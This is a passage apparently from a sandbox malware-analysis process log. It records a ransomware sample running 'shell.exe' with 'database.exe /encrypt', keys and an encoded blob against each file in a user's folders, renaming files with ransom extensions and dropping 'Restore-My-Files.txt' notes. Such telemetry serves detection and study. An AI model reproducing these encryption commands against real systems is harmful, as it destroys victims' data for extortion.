"+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\RenameSearch.emf.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:6952
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\RequestProtect.svg.sage.gif"5⤵PID:916
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\ResolveCopy.jpg.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:6512
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\RestartHide.raw.sage.gif"5⤵PID:1716
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\Restore-My-Files.txt"5⤵PID:5060
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\SelectUnblock.tif.sage.gif"5⤵PID:4044
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\SelectUninstall.cr2.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:2408
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\SelectUpdate.cr2.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:5160
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\SplitSubmit.dib.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:6668
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\StartRevoke.bmp.sage.gif"5⤵PID:916
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\StepSend.wmf.sage.gif"5⤵PID:6952
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\StopNew.gif.sage.gif"5⤵PID:5160
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\SyncPublish.jpg.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:6512
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\TraceRename.jpeg.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:796
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\UnpublishOpen.jpeg.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:3604
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\WaitRequest.jpg.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:5940
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\WatchComplete.ico.sage.gif"5⤵PID:3060
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Saved Games\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:6952
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Saved Games\Restore-My-Files.txt"5⤵PID:3544
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Searches\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:4324
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Searches\Everywhere.search-ms.gif"5⤵PID:5656
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Searches\Indexed Locations.search-ms.gif"5⤵PID:796
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Searches\Restore-My-Files.txt"5⤵PID:5940
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Videos\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:3084
-
-
